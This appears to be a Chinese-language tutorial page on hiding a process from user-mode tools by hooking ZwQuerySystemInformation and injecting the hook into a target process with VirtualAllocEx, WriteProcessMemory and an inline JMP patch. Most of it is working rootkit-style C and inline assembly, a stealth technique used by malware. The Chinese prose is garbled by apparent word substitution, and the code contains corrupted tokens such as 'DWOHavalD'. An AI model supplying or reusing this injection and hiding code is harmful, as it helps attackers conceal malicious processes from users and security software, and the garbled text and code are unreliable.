ACCESSring3 dll hide

ZwQuerySystemInformation(SystemProcessInformation,SystemInformation,Length,ReturnLength);

 

 

 

  pSystemProcesses = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;

  while (TRUE){

   printf(“进程PID: %d\n”,pSystemProcesses->InheritedFromProcessId);

   if (!pSystemProcesses->NextEntryOffset) {

    break;

   }

   pSystemProcesses = (PSYSTEM_PROCESS_INFORMATION)((char
*)pSystemProcesses + pSystemProcesses->NextEntryOffset);

  }

 

 

 

当是大家需要隐藏的长河的时候大家得以经过扩张NextEntryOffset的长短恐怕安装NextEntryOffset长度为0来掩藏进程。所以大家得以协会以下类似代码:

 

 

 

NTSTATUS

NTAPI

HOOK_ZwQuerySystemInformation(

         IN SYSTEM_INFORMATION_CLASS SystemInformationClass,

         OUT PVOID SystemInformation,

         IN ULONG SystemInformationLength,

         OUT PULONG ReturnLength OPTIONAL

         )

{

NTSTATUS ntStatus;

PSYSTEM_PROCESSES pSystemProcesses=NULL,Prev;

 

_asm{

  push ebx

  push ReturnLength

  push SystemInformationLength

  push SystemInformation

  push SystemInformationClass

  call ZwQuerySystemInformationProxy
//让原来函数执行到位,唯有如此函数才能重回大家必要的多少然后在数码里展开改动

  mov ntStatus,eax

  pop ebx

}

 

if (NT_SUCCESS(ntStatus) &&
SystemInformationClass==SystemProcessesAndThreadsInformation){

  pSystemProcesses = (PSYSTEM_PROCESSES)SystemInformation;

  while (TRUE){

   if (pSystemProcesses->;ProcessId==0x12345678){
//要是是大家须要隐藏的PID就开始展览多少修改

    if (pSystemProcesses->NextEntryDelta){

     //当大家须要隐藏的进度后边还有进度时

     //越过大家团结进程让NextEntryDelta直接针对下八个数据块

     Prev->NextEntryDelta += pSystemProcesses->NextEntryDelta;

    }else{

   
 //当大家经过处于最终二个数量那么大家就把上一个数据结构的NextEntryDelta置0

     //那时系统在遍历大家经过时就不会发现了

     Prev->NextEntryDelta=0;

    }

    break;

   }

   if (!pSystemProcesses->NextEntryDelta) {

    break;

   }

   Prev=pSystemProcesses;

   pSystemProcesses = (PSYSTEM_PROCESSES)((char *)pSystemProcesses +
pSystemProcesses->NextEntryDelta);

  }

}

return ntStatus;

}

 

 

 

咱俩为了不添加七个剩下的DLL所以必须是以Shellcode形式注入到目的经过,不过要那样写完整的shellcode确实有点麻烦,我们得以取巧利用程序来落到实处。

 

 

 

大家把函数内亟待重一直的地点全体利用__asm来成功比如下边的

 

 

 

_asm{

  push ebx

  push ReturnLength

  push SystemInformationLength

  push SystemInformation

  push SystemInformationClass

  call ZwQuerySystemInformationProxy
//让原来函数执行到位,唯有如此函数才能回到大家须求的数额然后在数量里实行改动

  mov ntStatus,eax

  pop ebx

}

 

 

 

调用绝对地址来完毕,这样就不需求重定位了。那样我们能够把这些函数拷贝到指标经过了,再拓展下指标地址的乘除就ok了。所以有类似上面包车型客车兑现代码:

 

 

 

BOOLEAN SetHook(DWORD dwProcessId,DWORD dwHideId)

{

BOOLEAN bRet=FALSE;

DWORD OldProtect;

DWORD dwCodeStart,dwCodeEnd,dwCodeSize;

BYTE HookCode[5]={0xE9,0,0,0,0};

HANDLE hProcess=NULL;

PVOID RemoteAllocBase=NULL;

DWORD dwFunAddress;

PUCHAR pBuffer;

 

dwCodeStart = GetFunAddress((PUCHAR)FunStart);

dwCodeEnd = GetFunAddress((PUCHAR)FunEnd);

dwCodeSize = dwCodeEnd-dwCodeStart;

 

hProcess = OpenProcess(PROCESS_ALL_ACCESS,

         FALSE,

         dwProcessId

         );

 

if (hProcess){

  RemoteAllocBase = VirtualAllocEx(hProcess,

           NULL,

           dwCodeSize,

           MEM_COMMIT,

           PAGE_EXECUTE_READWRITE

           );

  if (RemoteAllocBase){

   printf(“\t申请内部存款和储蓄器地址:0x%x\n”,RemoteAllocBase);

   g_lpRemoteAllocBase = RemoteAllocBase;

   if (ZwQuerySystemInformation){

    bRet=VirtualProtect((PVOID)dwCodeStart,

         dwCodeSize,

         PAGE_EXECUTE_READWRITE,

         &OldProtect

         );

    if (bRet){

     memcpy((PVOID)dwCodeStart,ZwQuerySystemInformation,5);
//那里能够在本进度中取备份代码也得以在长距离进程中取一般常常情况是同等的

     *(DWORD
*)(dwCodeStart+6)=(DWOHavalD)ZwQuerySystemInformation;//那里不必要用特色定位,因为肯定是在第四个字节开头的地点

     *HookCode=0xE9;

     dwFunAddress =
GetFunAddress((PUCHAR)HOOK_ZwQuerySystemInformation);

     dwFunAddress -= dwCodeStart;

     dwFunAddress += (DWORD)RemoteAllocBase;
//计算HOOK_ZwQuerySystemInformation在指标经过中的地址

   
 printf(“\tHOOK_ZwQuerySystemInformation内部存款和储蓄器地址:0x%x\n”,dwFunAddress);

     *(DWORD
*)&HookCode[1]=dwFunAddress-5-(DWORD)ZwQuerySystemInformation;

 

     dwFunAddress =
GetFunAddress((PUCHAR)HOOK_ZwQuerySystemInformation);

     for (pBuffer=(PUCHAR)dwFunAddress;

       pBuffer<(PUCHAR)dwFunAddress+(dwCodeEnd-dwFunAddress);

       pBuffer++

          )

     {

      if (*(DWORD *)pBuffer==0x12345678){

       *(DWORD *)pBuffer = dwHideId;

       break;

      }

     }

     VirtualProtect((PVOID)dwCodeStart,

           dwCodeSize,

           PAGE_EXECUTE_READWRITE,

           &OldProtect

           );

    }

   }

   bRet=WriteProcessMemory(hProcess,

         RemoteAllocBase,

         (PVOID)dwCodeStart,

         dwCodeSize,

         NULL

         );

   if (bRet){

    bRet=WriteProcessMemory(hProcess,

          ZwQuerySystemInformation,

          HookCode,

          5,

          NULL

          );

   }

  }

  CloseHandle(hProcess);

}

return bRet;

}

相关文章